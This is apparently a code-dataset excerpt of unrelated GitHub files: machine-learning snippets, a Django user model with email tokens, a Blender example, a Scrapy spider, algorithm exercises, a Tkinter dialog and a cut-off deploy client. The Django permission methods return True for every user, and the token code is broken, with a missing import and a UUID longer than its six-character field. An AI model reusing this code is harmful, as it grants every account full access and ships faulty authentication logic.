tf.GradientTape() as tape:\n            output = model(batch_X, training=True)\n            loss = criterion(batch_y, output)\n        gradients = tape.gradient(loss, model.trainable_variables)\n        opt.apply_gradients(zip(gradients, model.trainable_variables))\n        if (idx + 1) % 800 == 0:\n            LR /= 10\n            opt.learning_rate.assign(LR)","repo_name":"RandomAnass/Analysis-of-new-phenomena-in-deep-learning","sub_path":"functions/dots_models.py","file_name":"dots_models.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"24424323501","text":"# Updated by:\r\n# Yeimmy Katherin Lugo \r\n# 05/06/2023\r\n\r\nfrom django.db import models\r\nfrom django.contrib.auth.models import AbstractBaseUser, BaseUserManager, UserManager, PermissionsMixin, Permission\r\nfrom django.contrib.auth.models import AbstractUser\r\nfrom django_resized import ResizedImageField\r\nfrom django.contrib.auth.validators import UnicodeUsernameValidator\r\nfrom datetime import timedelta\r\nfrom django.contrib.auth.models import Group\r\nfrom django.utils.translation import gettext_lazy as _\r\nfrom uuid import uuid4  # needed by TokensEmail.create_token below; missing in the original\r\n\r\nfrom django.utils import timezone\r\n\r\nclass UserManager(BaseUserManager):\r\n    # Custom user manager\r\n    \r\n    def create_user(self, username, email, password=None):\r\n        # Creates and saves a regular user\r\n        \r\n        # Check that a valid email is provided\r\n        if not email:\r\n            raise ValueError('The user must have a valid email address.')\r\n        \r\n        # Create a user model instance with the username and the normalized email\r\n        user = self.model(\r\n            username=username,\r\n            email=self.normalize_email(email),\r\n        )\r\n        \r\n        # Set the provided password\r\n        user.set_password(password)\r\n        # Save the user to the database using the specified connection\r\n        user.save(using=self._db)\r\n        # Return the created user\r\n        return user\r\n\r\n    def create_superuser(self, username, email, password=None):\r\n        # Creates and saves a superuser\r\n        \r\n        # Use the create_user method to create a regular user with the same parameters\r\n        user = self.create_user(\r\n            username=username,\r\n            email=email,\r\n            password=password,\r\n        )\r\n        \r\n        # Set the superuser attributes\r\n        user.is_staff = True\r\n        user.is_superuser = True\r\n        # Save the user to the database using the specified connection\r\n        user.save(using=self._db)\r\n        # Return the created user\r\n        return user\r\n    \r\n\r\n
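# (Editor's note -- illustrative usage sketch added by the editor; it is not\r\n# part of the original file and the usernames/emails below are made up.) The\r\n# manager above backs User.objects in the class below, so creating accounts,\r\n# e.g. from a Django shell, would look like:\r\n#\r\n#   user = User.objects.create_user('alice', 'alice@example.com', password='s3cret')\r\n#   admin = User.objects.create_superuser('admin', 'admin@example.com', password='s3cret')\r\n#   assert admin.is_staff and admin.is_superuser\r\n\r\n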
class User(AbstractBaseUser, PermissionsMixin):\r\n    # Username field; must be unique, with a maximum of 255 characters.\r\n    username = models.CharField(unique=True, max_length=255)\r\n    # Email field; must be unique.\r\n    email = models.EmailField(unique=True)\r\n    # Field storing the date and time of the user's last login.\r\n    last_login = models.DateTimeField(null=True, blank=True, auto_now=True)\r\n\r\n    #nickname=models.CharField(max_length=55, unique=True)\r\n\r\n    # Flag indicating whether the user is active; defaults to True.\r\n    is_active = models.BooleanField(default=True)\n    # Flag indicating whether the user is staff; defaults to False.\n    is_staff = models.BooleanField(default=False)\n    \n    # ManyToMany relation with the Group model to assign groups to the user.\n    groups = models.ManyToManyField(\n        Group,\n        verbose_name=_('groups'),\n        blank=True,\n        related_name='api_users'\n    )\n    \n    # ManyToMany relation with the Permission model to assign permissions to the user.\n    user_permissions = models.ManyToManyField(\n        Permission,\n        verbose_name=_('user permissions'),\n        blank=True,\n        related_name='api_users'\n    )\n    \n    # Instance of the custom user manager.\n    objects = UserManager()\n    # Field used as the username for authentication.\n    USERNAME_FIELD = 'username'\n    # Additional fields required when creating a user.\n    REQUIRED_FIELDS = ['email']\n    \n    def has_perm(self, perm, obj=None):\n        # Checks whether the user has a specific permission.\n        # Here it always returns True, granting every permission.\n        return True\n\n    def has_module_perms(self, app_label):\n        # Checks whether the user has permissions on a specific module.\n        # Here it always returns True, granting permissions on any module.\n        return True\n\n    def __str__(self) -> str:\n        # Returns a string representation of the user (here, the ID).\n        return str(self.id)\n    \n\nclass TokensEmail(models.Model):\n    token = models.CharField(max_length=6) # Model field storing a token of at most 6 characters\n    created_at = models.DateTimeField(auto_now_add=True) # Model field recording when the token was created\n    expires_at = models.DateTimeField() # Model field recording when the token expires\n    is_valid = models.BooleanField(default=True) # Model field indicating whether the token is valid (default: True)\n\n    def is_expired(self):\n        return self.expires_at <= timezone.now() # Checks whether the token has expired by comparing its expiry against the current time\n\n    def save(self, *args, **kwargs):\n        if not self.expires_at:\n            self.expires_at = timezone.now() + timedelta(minutes=10) # If no expiry is set, default it to 10 minutes in the future\n        super().save(*args, **kwargs) # Call the base class save() to persist the object\n        if self.is_valid and self.is_expired():\n            self.is_valid = False # If the token is marked valid but has expired, flag it as invalid\n            self.save() # Save again to persist the validity change\n\n    @classmethod\n    def create_token(cls):\n        token_obj = cls.objects.filter(is_valid=True, expires_at__gte=timezone.now()).first()\n        # Looks for a valid token object whose expiry is at or after the current time\n\n        if token_obj:\n            token_obj.expires_at = timezone.now() + timedelta(minutes=10)\n            token_obj.save()\n            # If a valid token is found, extend its expiry by another 10 minutes\n        else:\n            token = str(uuid4())\n            token_obj = cls(token=token)\n            token_obj.save()\n            # Otherwise create a new token with a random UUID (universally unique identifier) value\n\n        return token_obj # Return the created or refreshed token object\n\n    @classmethod\n    def clean_tokens(cls):\n        tokens = cls.objects.filter(is_valid=True)\n        # Fetch every token object that is still marked valid\n\n        for token in 
tokens:\n            if token.is_expired():\n                token.is_valid = False # If the token has expired, mark it as invalid\n                token.save() # Save the object again to persist the validity change\n\n\n\n# @classmethod\n# def create_token(cls):\n#     from uuid import uuid4\n#     token = str(uuid4())\n#     token_obj = cls(token=token)\n#     token_obj.save()\n#     return token_obj\n\n# @classmethod\n# def clean_tokens(cls):\n#     tokens = cls.objects.filter(is_valid=True)\n#     for token in tokens:\n#         if token.is_expired():\n#             token.is_valid = False\n#             token.save()\n\n# @periodic_task(run_every=crontab(minute='*/10'))\n# def clean_tokens():\n#     Token.clean_tokens()\n\n#Create your models here.\n\n\n\n\n\n\n# class CustomUserManager(BaseUserManager):\n#     def create_user(self, email, password=None, **extra_fields):\n#         if not email:\n#             raise ValueError('The Email field must be set')\n#         email = self.normalize_email(email)\n#         user = self.model(email=email, **extra_fields)\n#         user.set_password(password)\n#         user.save(using=self._db)\n#         return user\n\n#     def create_superuser(self, email, password=None, **extra_fields):\n#         extra_fields.setdefault('is_staff', True)\n#         extra_fields.setdefault('is_superuser', True)\n#         return self.create_user(email, password, **extra_fields)\n\n\n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n# class User(AbstractBaseUser, PermissionsMixin):\n#     # username_validator = UnicodeUsernameValidator()\n#     username = models.CharField(\n#         ('username'),\n#         max_length=150,\n#         unique=True,\n#         help_text=('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),\n#         # validators=[username_validator],\n#         error_messages={\n#             'unique': (\"A user with that username already exists.\"),\n#         },\n#     )\n#     #first_name = models.CharField(('first name'), max_length=150, blank=True)\n#     #last_name = models.CharField(('last name'), max_length=150, blank=True)\n\n#     email = models.EmailField(('email address'), unique=True)\n#     is_staff = models.BooleanField(\n#         ('staff status'),\n#         default=False,\n#         help_text=('Designates whether the user can log into this admin site.'),\n#     )\n#     is_active = models.BooleanField(\n#         ('active'),\n#         default=True,\n#         help_text=(\n#             'Designates whether this user should be treated as active. '\n#             'Unselect this instead of deleting accounts.'\n#         ),\n#     )\n#     date_joined = models.DateTimeField(('date joined'), default=timezone.now)\n#     email = models.EmailField(unique=True)\n#     @classmethod\n#     def create_user(cls, email):\n#         if not email:\n#             raise ValueError('The Email field must be set')\n#         user = cls(email=email)\n#         user.save()\n#         return user\n#     EMAIL_FIELD = 'email'\n#     USERNAME_FIELD = 'email'\n#     REQUIRED_FIELDS = ['username']\n#     objects = CustomUserManager()\n#     def __str__(self):\n#         return self.email\n    \n\n\n\n\n\n\n\n\n\n\n\n\n    # def generate_otp(self):\n    #     import pyotp\n    #     totp = pyotp.TOTP('JBSWY3DPEHPK3PXP')\n    #     return totp.now()\n    \n    # username_validator = UnicodeUsernameValidator()\n\n    # username = models.CharField(\n    #     ('username'),\n    #     max_length=150,\n    #     unique=True,\n    #     help_text=('Required. 150 characters or fewer. 
Letters, digits and @/./+/-/_ only.'),\n    #     validators=[username_validator],\n    #     error_messages={\n    #         'unique': (\"A user with that username already exists.\"),\n    #     },\n    #)\n    # first_name = models.CharField(('first name'), max_length=150, blank=True)\n    # last_name = models.CharField(('last name'), max_length=150, blank=True)\n    # email = models.EmailField(('email address'), unique=True)\n    # is_staff = models.BooleanField(\n    #     ('staff status'),\n    #     default=False,\n    #     help_text=('Designates whether the user can log into this admin site.'),\n    # )\n    # is_active = models.BooleanField(\n    #     ('active'),\n    #     default=True,\n    #     help_text=(\n    #         'Designates whether this user should be treated as active. '\n    #         'Unselect this instead of deleting accounts.'\n    #     ),\n    # )\n    # date_joined = models.DateTimeField(('date joined'), default=timezone.now)\n\n    # objects = UserManager()\n\n    # EMAIL_FIELD = 'email'\n    # USERNAME_FIELD = 'email'\n    # REQUIRED_FIELDS = ['username']\n    # nickname = models.CharField(max_length=55)\n    # # profile_picture=ResizedImageField(upload_to,null=True,blank=True)\n    \n    # def __str__(self):\n    #     return self.email\n\n    # def generate_otp(self):\n    #     import pyotp\n    #     totp = pyotp.TOTP('JBSWY3DPEHPK3PXP')\n    #     return totp.now()\n    \n    \n    \n# class Project(models.Model):\n#     id = models.AutoField(primary_key= True)\n#     nombre = models.CharField('Nombre', max_length= 100)\n#     descripcion = models.CharField('Descripcion', max_length= 500)\n\n    \n\n#     def __str__(self):\n#         return f'{self.nombre} : {self.descripcion}'\n\n# class Device(models.Model):\n#     nombre = models.CharField('Nombre', max_length= 100, primary_key= True)\n\n    \n#     def __str__(self):\n#         return f'{self.nombre}'\n\n# class Template(models.Model):\n\n#     namehardware = models.CharField('Namehardware', max_length=100, primary_key=500)\n#     descripcionTemplate = models.CharField('Descripcion', max_length=500)\n    \n#     def __str__(self):\n#         return f'{self.namehardware } : {self.descripcionTemplate}' ","repo_name":"PIANTAIOT/Pianta---IOT---Backend-","sub_path":"Pianta/ApiPianta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12266,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11778574154","text":"# Adding a point constraint #\n###############################\n\n# import BGE internal modules (the original omitted 'import bge' and would raise a NameError below)\nimport bge\nimport PhysicsConstraints\n\n# get object list\nobj_list = bge.logic.getCurrentScene().objects\n\n# get the root and obj objects\nroot = obj_list[\"root\"]\nobj = obj_list[\"obj\"]\n\n# get object physics ID\nphido = obj.getPhysicsId()\n\n# get root physics ID\nphidr = root.getPhysicsId()\n\n# want to use point constraint type\nconstraint_type = 1\n\n# Use bottom right front corner of object for point constraint position\npoint_pos_x = 1.0\npoint_pos_y = -1.0\npoint_pos_z = -1.0\n\n# create a point constraint\nconst =\tPhysicsConstraints.createConstraint( phido, phidr, constraint_type, point_pos_x, point_pos_y, point_pos_z)\n\n# stores the new constraint ID to be used later\nobj[\"constraint_ID\"] = const.getConstraintId()\t\n\n
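# (Editor's note -- explanatory comment added; the constraint-type codes are an\n# assumption based on the BGE documentation rather than something stated in\n# this script.) constraint_type = 1 above selects Bullet's point-to-point\n# constraint; other integer codes select other joint kinds (e.g. hinges). The\n# constraint ID is stashed in the obj[\"constraint_ID\"] game property precisely\n# so the removal snippet below can look the constraint up again later.\n\n\n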
# Removing a point constraint #\n#################################\n\n# import BGE internal modules (again, 'import bge' was missing in the original)\nimport bge\nimport PhysicsConstraints\n\n# get object list\nobj_list = bge.logic.getCurrentScene().objects\n\n# get object 1\nobj = obj_list[\"obj\"]\n\n# get constraint ID that was saved as an obj property\n# when the constraint was created\nconstraint_ID = obj[\"constraint_ID\"]\n\n# remove constraint\nPhysicsConstraints.removeConstraint(constraint_ID)\n","repo_name":"zakharov/blenderColladaKinematics","sub_path":"models/blender/doc/python_api/alternative/examples/PhysicsConstraints.py","file_name":"PhysicsConstraints.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"}
+{"seq_id":"8425341203","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import TencentItem\n\n\nclass TencentpositionSpider(scrapy.Spider):\n    name = 'tencentPosition'\n    allowed_domains = ['tencent.com']\n    url = \"http://hr.tencent.com/position.php?start=\"\n    offset = 0\n    start_urls = [url + str(offset)]\n\n    def parse(self, response):\n        for each in response.xpath('//tr[@class=\"even\"] | //tr[@class=\"odd\"]'):\n            # Initialize the item object\n            item = TencentItem()\n            # Position name\n            item['positionName'] = each.xpath(\"./td[1]/a/text()\").extract()[0]\n            # Detail page link\n            item['positionLink'] = each.xpath(\"./td[1]/a/@href\").extract()[0]\n            # Position category\n            item['positionType'] = each.xpath(\"./td[2]/text()\").extract()[0]\n            # Number of openings\n            item['peopleNum'] = each.xpath(\"./td[3]/text()\").extract()[0]\n            # Work location\n            item['workLocation'] = each.xpath(\"./td[4]/text()\").extract()[0]\n            # Publish time\n            item['publishTime'] = each.xpath(\"./td[5]/text()\").extract()[0]\n\n            # Send the data to the pipeline\n            yield item\n\n        # Re-issue the request in scrapy (fetch the next page after finishing this one)\n        if self.offset < 1680:\n            self.offset += 10\n        else:\n            # break\n            raise Exception(\"job finished\")  # raising a bare string, as the original did, is invalid in Python 3\n        # Request the next page\n        # callback is the function that handles the response\n        yield scrapy.Request(url=(self.url + str(self.offset)), callback=self.parse)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aaqingsongyike/Python","sub_path":"Python_Reptlie_Scrapy/tencent/tencent/spiders/tencentPosition.py","file_name":"tencentPosition.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30491857908","text":"from sklearn.neural_network import MLPClassifier\nimport sklearn\nimport sknn\nfrom sklearn import datasets, linear_model\nfrom sklearn import neural_network\n\nimport numpy as np\nif __name__ == '__main__':\n    dimension = 10\n    num_actions = 2\n\n    state_example = np.random.rand(4)\n    state = [np.random.rand(4)for i in range(2)]\n\n    phi_example = np.random.rand(dimension)\n    test_phi = [np.random.rand(dimension) for i in range(2)]\n\n\n    clf = neural_network.MLPRegressor(alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)\n    clf.fit(state, test_phi)\n\n    test_phi = np.ones(dimension * num_actions)\n    test_phi_new = np.zeros(dimension * num_actions)\n    for i in range(int(len(test_phi_new) / num_actions)):\n        test_phi_new[i] = 1.0\n\n    test_phi = np.split(test_phi, num_actions)\n    test = np.random.rand(4)\n    test2 = np.random.rand(4)\n    print(test)\n    print(clf.predict([test]).flatten())\n    print(clf.predict([test2])[0])\n\n\n\n","repo_name":"NEAT-RL/Expectation-Maximisation","sub_path":"skikit.py","file_name":"skikit.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34679649910","text":"\"\"\" View\n\"\"\"\nfrom urllib import urlencode\nfrom eea.googlecharts.widgets.view import View as Widget\n\nclass View(Widget):\n    \"\"\" View portlet widget\n    \"\"\"\n\n    @property\n    def width(self):\n        \"\"\" Widget width\n        \"\"\"\n        return self.widget.get('dashboard', {}).get('width', 800)\n\n    @property\n    def height(self):\n        \"\"\" Widget height\n        \"\"\"\n        return self.widget.get('dashboard', {}).get('height', 600)\n\n    @property\n    def 
src(self):\n \"\"\" Src\n \"\"\"\n query = {\n 'chart': self.widget.get('name', ''),\n 'width': self.width,\n 'height': self.height,\n }\n\n return u'%s/chart-full?%s' % (\n self.context.absolute_url(),\n urlencode(query)\n )\n","repo_name":"eea/eea.googlecharts","sub_path":"eea/googlecharts/widgets/chart/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"22381099029","text":"# https://leetcode.com/problems/k-closest-points-to-origin/\n\nimport heapq\n\n\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n min_heap = []\n for x, y in points:\n distance = x ** 2 + y ** 2\n min_heap.append((distance, x, y))\n heapq.heapify(min_heap)\n\n res = []\n for _ in range(k):\n _, x, y = heapq.heappop(min_heap)\n res.append([x, y])\n\n return res\n","repo_name":"shota-tech/leetcode","sub_path":"python/heap/973_k_closest_points_to_origin.py","file_name":"973_k_closest_points_to_origin.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29873669012","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\ndn = [-1, 0, 1, 0, 0, 0]\ndm = [0, 1, 0, -1, 0, 0]\ndh = [0, 0, 0, 0, 1, -1]\nM, N, H = map(int, input().split())\nboxes = []\nfor _ in range(H):\n box = [list(map(int, input().split())) for _ in range(N)]\n boxes.append(box)\n\ncnt = 0\ntomato = deque()\nvisited = [[[0] * M for _ in range(N)] for _ in range(H)]\nfor h in range(H):\n for n in range(N):\n for m in range(M):\n if boxes[h][n][m] == 1:\n visited[h][n][m] = 1\n tomato.append([h, n, m])\n elif boxes[h][n][m] == 0:\n cnt += 1\n\nans = 0\nwhile True and cnt:\n nx = []\n while tomato:\n h, n, m = tomato.popleft()\n for i in range(6):\n nh, nn, nm = h + dh[i], n + dn[i], m + dm[i]\n if nh < 0 or nh >= H or nn < 0 or nn >= N or nm < 0 or nm >= M:\n continue\n if visited[nh][nn][nm]:\n continue\n if boxes[nh][nn][nm] != 0:\n continue\n\n cnt -= 1\n visited[nh][nn][nm] = 1\n nx.append([nh, nn, nm])\n\n ans += 1\n if cnt == 0:\n break\n elif not nx:\n ans = -1\n break\n tomato = deque(nx)\n\nprint(ans)\n","repo_name":"essk13/Algorithm","sub_path":"01_problem/python/2022/02/0214/BAEKJOON_7569/7569_BAEKJOON.py","file_name":"7569_BAEKJOON.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4398984169","text":"import os\r\nfrom pathlib import Path\r\nfrom rich import print\r\nfrom joblib import Parallel, delayed\r\nfrom tqdm import tqdm\r\n\r\nimport utils\r\nimport visualization as vis\r\nimport metrics as ym\r\n\r\nimport cv2\r\n\r\n\r\ndef do_process(mdl_ndx, preprocessing):\r\n detection_name = f\"exp-incisive-{mdl_ndx}-{'y' if preprocessing else 'n'}\"\r\n\r\n pp = \"\" if not preprocessing else \"_pp\"\r\n\r\n # data_dir = Path(os.getcwd()).parent / \"results\"\r\n data_dir = Path(os.getcwd()) / \"src\" / \"utils\" / \"results\" / \"mg\"\r\n\r\n images_dir = data_dir / (\"images\" + pp)\r\n target_cont_dir = data_dir / (\"contours\" + pp) / \"test\"\r\n\r\n predicted_annotations_dir = data_dir / \"detect\" / detection_name / \"labels\"\r\n\r\n def process_image(file_name):\r\n image = utils.load_image(images_dir / f\"{file_name}.png\")\r\n [h, w] = image.shape[:2]\r\n target_cont = utils.load_relative_contours(target_cont_dir / f\"{file_name}.txt\")\r\n 
target_cont = [utils.r2a_contour(r, w, h) for r in target_cont]\r\n\r\n        try:\r\n            predicted_boxes = utils.load_relative_rectangles(\r\n                predicted_annotations_dir / f\"{file_name}.txt\"\r\n            )\r\n            predicted_boxes = [\r\n                utils.r2a_rectangle(rect, w, h) for rect in predicted_boxes\r\n            ]\r\n        except Exception:\r\n            predicted_boxes = []\r\n\r\n        target_mask = utils.create_mask_from_contours(target_cont, w, h)\r\n        predicted_mask = utils.create_mask_from_rectangles(predicted_boxes, w, h)\r\n        return ym.evaluate(target_mask, predicted_mask)\r\n\r\n    file_names = utils.list_file_names(images_dir)\r\n    file_names = [f for f in file_names if \"_uns2_\" in f]\r\n\r\n    results = Parallel(n_jobs=4)(delayed(process_image)(f) for f in tqdm(file_names))\r\n    # results = (process_image(f) for f in tqdm(file_names))\r\n\r\n    total_tp, total_tn, total_fp, total_fn = 0, 0, 0, 0\r\n    for tp, tn, fp, fn in results:\r\n        total_tp += tp\r\n        total_fp += fp\r\n        total_tn += tn\r\n        total_fn += fn\r\n\r\n    print(\"\")\r\n    print(\"model: \", detection_name)\r\n    print(\"using preprocessing: \", preprocessing)\r\n    print(\"images dir: \", images_dir)\r\n    print(\"tgt ann dir: \", target_cont_dir)\r\n    print(\"prd ann dir: \", predicted_annotations_dir)\r\n    # ---\r\n    p, r, f1 = ym.p_r_f1(total_tp, total_tn, total_fp, total_fn)\r\n    print(f\"[bold blue]P[/]\\t{p:.3f}\")\r\n    print(f\"[bold blue]R[/]\\t{r:.3f}\")\r\n    print(f\"[bold blue]F1[/]\\t{f1:.3f}\")\r\n\r\n\r\nmdl_index = 8\r\nif __name__ == \"__main__\":\r\n    do_process(mdl_index, False)\r\n    do_process(mdl_index, True)\r\n","repo_name":"rapaja/aiworkbench","sub_path":"src/incisive/scripts/backup/script_pointwise_prf1_cont.py","file_name":"script_pointwise_prf1_cont.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"15377062476","text":"from tkinter import *\nfrom functools import partial  # To prevent unwanted windows\n\nimport random\n\n\nclass Converter:\n    def __init__(self):\n\n        # Formatting Variables...\n        background_color = \"light blue\"\n\n        self.all_calc_list = ['123 degrees F is 50.6 degrees C',\n                              '123 degrees C is 253.4 degrees F',\n                              '123 degrees F is 50.6 degrees C',\n                              '123 degrees C is 253.4 degrees F',\n                              '123 degrees F is 50.6 degrees C',\n                              '123 degrees C is 253.4 degrees F',\n                              '123 degrees F is 50.6 degrees C']\n\n        # self.all_calc_list = []\n\n\n        # Converter Main Screen GUI...\n        self.converter_frame = Frame(width=600, height=600, bg=background_color, pady=10)\n        self.converter_frame.grid()\n\n        self.temp_converter_label = Label(self.converter_frame, text=\"Temperature Converter\",\n                                          font=(\"Arial\", \"16\", \"bold\"),\n                                          bg=background_color,\n                                          padx=10, pady=10)\n        self.temp_converter_label.grid(row=0)\n\n        self.export_button = Button(self.converter_frame, text=\"export\"\n                                    , font=(\"Arial\", \"14\"),\n                                    padx=10, pady=10,\n                                    command=lambda: self.export(self.all_calc_list))\n        self.export_button.grid(row=1)\n\n        if len(self.all_calc_list) == 0:\n            self.export_button.config(state=DISABLED)\n\n    def export(self, calc_export):\n        Export(self, calc_export)\n\n\nclass Export:\n    def __init__(self, partner, calc_export):\n\n        background = 'white'\n\n        partner.export_button.config(state=DISABLED)\n\n        self.export_box = Toplevel()\n\n        self.export_box.protocol('WM_DELETE_WINDOW', partial(self.close_export,partner))\n\n        self.export_frame = Frame(self.export_box, width=300, bg=background)\n        self.export_frame.grid()\n\n        self.how_heading = Label(self.export_frame, text=\"Calculation export\",\n                                 font='arial 10 bold', bg=background)\n        self.how_heading.grid(row=0)\n\n        self.export_text = Label(self.export_frame,\n                                 text=\"Enter a filename in the \"\n                                      \"box below and press the \"\n                                      \"save button to save your \"\n                                      \"calculation history to a \"\n                                      \"text file\"\n                                 , justify=LEFT, width=40,\n                                 bg=background, wrap=250)\n        self.export_text.grid(row=1)\n\n        # Entry Box for file name goes here...\n        self.filename_entry = Entry(self.export_frame,\n                                    width=20, font=\"Arial 14 bold\", justify=CENTER)\n        self.filename_entry.grid(row=3, pady=10)\n\n        self.export_dismiss_frame = Frame(self.export_frame)\n        self.export_dismiss_frame.grid(row=4, pady=10)\n\n        self.save_button = Button(self.export_dismiss_frame, text=\"Save\",\n                                  font=\"Arial 12 bold\")\n        self.save_button.grid(row=0, column=0)\n\n        self.dismiss_button = Button(self.export_dismiss_frame, text=\"Dismiss\",\n                                     font=\"Arial 12 bold\",\n                                     command=partial(self.close_export, partner))\n        self.dismiss_button.grid(row=0, column=1)\n\n
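        # (Editor's note -- sketch added by the editor, not in the original\n        # file.) The Save button above is created without a command, so\n        # pressing it does nothing yet. A minimal handler, reusing the\n        # calc_export list this dialog already receives, could look like:\n        #\n        #   def save_history(self):\n        #       filename = self.filename_entry.get() + \".txt\"\n        #       with open(filename, \"w\") as f:\n        #           f.write(\"\\n\".join(self.calc_export))\n        #\n        # wired up via command=self.save_history (storing calc_export on self\n        # in __init__ first -- an assumption, since the original does not).\n\n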
bold', bg=background)\n self.how_heading.grid(row=0)\n\n self.export_text = Label(self.export_frame,\n text=\"Enter a filename in the\"\n \"box below and press the\"\n \"save button to save your\"\n \"calculation history to a\"\n \"text file\"\n , justify=LEFT, width=40,\n bg=background, wrap=250)\n self.export_text.grid(row=1)\n\n # Entry Box for file name goes here...\n self.filename_entry = Entry(self.export_frame,\n width=20, font=\"Arial 14 bold\", justify=CENTER)\n self.filename_entry.grid(row=3, pady=10)\n\n self.export_dismiss_frame = Frame(self.export_frame)\n self.export_dismiss_frame.grid(row=4, pady=10)\n\n self.save_button = Button(self.export_dismiss_frame, text=\"Save\",\n font=\"Arial 12 bold\")\n self.save_button.grid(row=0, column=0)\n\n self.dismiss_button = Button(self.export_dismiss_frame, text=\"Dismiss\",\n font=\"Arial 12 bold\",\n command=partial(self.close_export, partner))\n self.dismiss_button.grid(row=0, column=1)\n\n # closes export dialogue\n def close_export(self, partner):\n\n partner.export_button.config(state=NORMAL)\n self.export_box.destroy()\n\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Temperature Converter\")\n something = Converter()\n root.mainloop()","repo_name":"KeananI/01_Temperature","sub_path":"09_Export_GUI.py","file_name":"09_Export_GUI.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37291483726","text":"import requests\nurl=\"https://www.epicurious.com/search/tofu%20chilli\"\nurl=\"https://en.wikipedia.org/wiki/Main_Page\"\nresponse=requests.get(url)\n# 200 es OK el resto ex 404 not found\nprint(response)\n# contenido de la respuesta, en este caso la web\n#utf-8 en principio sobra es por defecto\nrespuesta=response.content\n\nrespuesta=response.content.decode('utf-8')\nbusqueda='Did you know'\n#busca el texto dentro de lo que ha devuelto la pagina\nprint(respuesta.find(busqueda))\n","repo_name":"pedraki/curso_edx","sub_path":"edx/analytics/ana00.py","file_name":"ana00.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28469510534","text":"import os\nimport numpy as np\nfrom functools import reduce\n\n# DT and T data in a dictionary CAN become quite slow!\n# If updating storage of dt/t data to a np.array - need a different merge method\nclass DiagramData:\n def __init__(self, filenames, cfg):\n self.diagram_data = {}\n for filename in filenames: \n new_data = DiagramFileLoader(filename+\"{}.txt\".format(cfg)).data\n merge(self.diagram_data, new_data)\n\nclass DiagramFileLoader:\n def __init__(self, filename):\n if not os.path.exists(filename):\n raise SystemError(\"File does not exist! 
Tried loading {}\".format(filename))\n else:\n self.data = self.load_diagram_file(filename)\n\n def load_diagram_file(self,filename):\n self.diagram_data={}\n\n with open(filename, \"r\") as file:\n current_diagram=None\n for line in file:\n if line[0]==\"B\":\n current_diagram=line[:-1]\n self.diagram_data[current_diagram]={}\n else:\n data=line.split(' ')\n dt=int(data[0])\n t=int(data[1])\n value=complex(float(data[2]),float(data[3]))\n \n if dt in self.diagram_data[current_diagram]:\n self.diagram_data[current_diagram][dt][t]=value\n else:\n self.diagram_data[current_diagram][dt]={t: value}\n\n return self.diagram_data\n\n# from https://stackoverflow.com/questions/7204805/how-to-merge-dictionaries-of-dictionaries\ndef merge(a, b, path=None):\n #\"merges b into a\"\n if path is None: path = []\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n merge(a[key], b[key], path + [str(key)])\n elif a[key] == b[key]:\n pass # same leaf value\n else:\n raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))\n else:\n a[key] = b[key]\n return a\n\n# works\n#print(merge({1:{\"a\":\"A\"},2:{\"b\":\"B\"}}, {2:{\"c\":\"C\"},3:{\"d\":\"D\"}}))\n# has conflict\n#merge({1:{\"a\":\"A\"},2:{\"b\":\"B\"}}, {1:{\"a\":\"A\"},2:{\"b\":\"C\"}})","repo_name":"chrisculver/PyCorrelationMatrixManager","sub_path":"PyCorrelationMatrixManager/diagram_data.py","file_name":"diagram_data.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22809545997","text":"from typing import TYPE_CHECKING, Any, Dict, List, Optional, Union\n\nfrom paasng.engine.controller.client import ControllerClient\nfrom paasng.engine.controller.shortcuts import make_internal_client\nfrom paasng.engine.helpers import SlugbuilderInfo\n\nif TYPE_CHECKING:\n from paasng.dev_resources.sourcectl.models import VersionInfo\n\n\nclass EngineDeployClient:\n \"\"\"A high level client for engine\"\"\"\n\n def __init__(self, engine_app, controller_client: ControllerClient = None):\n self.engine_app = engine_app\n self.ctl_client = controller_client or make_internal_client()\n\n def start_build_process(\n self,\n version: 'VersionInfo',\n stream_channel_id: str,\n source_tar_path: str,\n procfile: dict,\n extra_envs: Dict[str, str],\n ) -> str:\n \"\"\"Start a new build process\"\"\"\n # get slugbuilder and buildpacks from engine_app\n build_info = SlugbuilderInfo.from_engine_app(self.engine_app)\n # 注入构建环境所需环境变量\n extra_envs = {**extra_envs, **build_info.environments}\n\n resp = self.ctl_client.app__build_processes(\n app_name=self.engine_app.name,\n 